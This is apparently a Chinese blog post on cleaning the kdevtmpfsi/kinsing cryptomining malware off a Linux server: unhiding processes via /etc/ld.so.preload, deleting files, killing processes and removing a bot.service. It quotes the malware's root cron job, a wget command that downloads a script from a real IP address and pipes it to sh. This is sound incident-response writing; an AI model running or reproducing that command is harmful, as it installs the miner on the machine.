挖矿病毒kdevtmpfsi,kinsing进程隐藏解决

参考了下面这篇文章最终解决了自己的问题:记录一次linux负载和总cpu高,top查看不到高占用cpu资源的相关问题排查_汪汪伟的博客-CSDN博客

我的问题当时输入top未找到耗cup的进程然后根据上面博主的提示查看了目录cat /etc/ld.so.preload内容 被转到

 然后在/etc下找到ld.so.preload

删除ld.so.preload

输入top,进程出来了

然后 systemctl status 11468 找到病毒及病毒守护线程对应目录并删除, rm -rf kdevtmpfsi,rm -rf kinsing

 

然后crontab -l 查看异常定时任务

最终在cd /var/spool/cron/目录下找到文件root,里面有定时任务

wget -q -o - http://91.241.19.134/unk.sh | sh > /dev/null 2>&1

删除定时任务

然后查看守护进程ps -aux | grep kinsing

查看病毒进程ps -aux | grep kdevtmpfsi

 

杀掉kill -9 22329  11468

然后成功杀掉病毒进程

========================2022.11.18====================================

最近发现新病毒,增加了bot.service的切入,

搜索find / -name bot.service  进入对应文件

 

首先进入etc下删除kinsing

再返回到之前查找到的bot.service位置,kill掉对应的守护线程

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值